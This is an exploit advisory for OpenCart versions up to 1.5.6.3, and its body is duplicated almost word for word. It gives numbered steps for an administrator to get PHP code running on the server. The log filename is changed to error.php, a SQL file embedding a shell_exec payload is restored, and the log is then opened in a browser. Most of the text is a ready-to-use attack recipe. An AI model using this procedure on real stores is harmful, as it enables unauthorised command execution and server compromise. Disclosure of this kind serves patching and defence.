# Exploit Title: Opencart <= 1.5.6.3 Upload Shell [ admin required ]
# Date: 18.04.2014
# Exploit Author: waszilica
# Author HomePage: http://rstforums.com
# Software Link: http://www.opencart.com/index.php?route=download/download
# Platform: linux/php
# Version: Opencart <= 1.5.6.3
# Video: http://www.screenr.com/IFxN
Preconditions:
Admin privileges needed
Old solution and sometimes not working method: Go to Catalog -> Downloads and upload file
This trick works by renaming the error log file from error.txt to error.php ( or whatever.php ) and make an wrong sql query in order to log it
1.Go to System -> Settings -> Edit (Your Store) -> Server Tab and at "Error Log Filename" input... put error.php and click save
2.Create example.sql with this content: SELECT '<?php echo "<pre>";print_r(shell_exec("ls ../../")); ?>' FROM `inexistent_table`
3.Go to System -> Backup / Restore and at Restore Backup select your example.sql file and press Restore
4.Go to http://www.site.com/system/logs/error.php and there is your php code executed.
//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise.Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information
# Date: 18.04.2014
# Exploit Author: waszilica
# Author HomePage: http://rstforums.com
# Software Link: http://www.opencart.com/index.php?route=download/download
# Platform: linux/php
# Version: Opencart <= 1.5.6.3
# Video: http://www.screenr.com/IFxN
Preconditions:
Admin privileges needed
Old solution and sometimes not working method: Go to Catalog -> Downloads and upload file
This trick works by renaming the error log file from error.txt to error.php ( or whatever.php ) and make an wrong sql query in order to log it
1.Go to System -> Settings -> Edit (Your Store) -> Server Tab and at "Error Log Filename" input... put error.php and click save
2.Create example.sql with this content: SELECT '<?php echo "<pre>";print_r(shell_exec("ls ../../")); ?>' FROM `inexistent_table`
3.Go to System -> Backup / Restore and at Restore Backup select your example.sql file and press Restore
4.Go to http://www.site.com/system/logs/error.php and there is your php code executed.
//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise.Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information